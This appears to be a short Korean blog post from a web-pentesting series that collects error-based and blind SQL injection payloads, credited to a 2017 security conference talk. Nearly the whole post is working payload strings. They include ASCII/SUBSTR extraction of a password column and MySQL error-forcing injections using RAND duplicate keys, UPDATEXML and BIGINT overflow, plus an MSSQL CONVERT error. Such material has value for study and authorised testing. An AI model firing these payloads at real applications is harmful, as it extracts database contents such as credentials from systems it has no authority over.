Error based SQL Injection 모음

Hunjison·2021년 7월 25일
1

Web Pentesting

목록 보기
1/9

출처 - SECUINSIDE 2017, rubiya

Blind SQL injection

  1. group by

    select * from test where 1=0 group by 1,2,3,4,5 -- g

  2. multi result rows

    select * from test where if(1=1,1,(select 1 union select 2)) -- g

  3. blind sql injection

    select(select 96 union select ascii(substr((select pw from users),1,1)))
# if 96 returns, no error occured.

DB 종류별 Error 발생

#0. MySQL

  1. Duplicate Entry

    ||1 group by mid(version(), rand()) having min(1) #
||row(1,1)=(select sum(5),concat(version(),floor(rand(0)*2)) as x from information_schema.tables group by x) #

  2. XPATH syntax error

    ||updatexml(0,concat(0xa,version()),0) #

  3. BIGINT value is out of range in

    --~(select*from(select@@version)f)#

#1. MSSQL

  1. Conversion error

    ||1=convert(int,db_name()) -- g
profile
Hunjison
비전공자 출신 화이트햇 해커
다음 포스트

자바스크립트 난독화 분석(Javascript Obfuscator)

0개의 댓글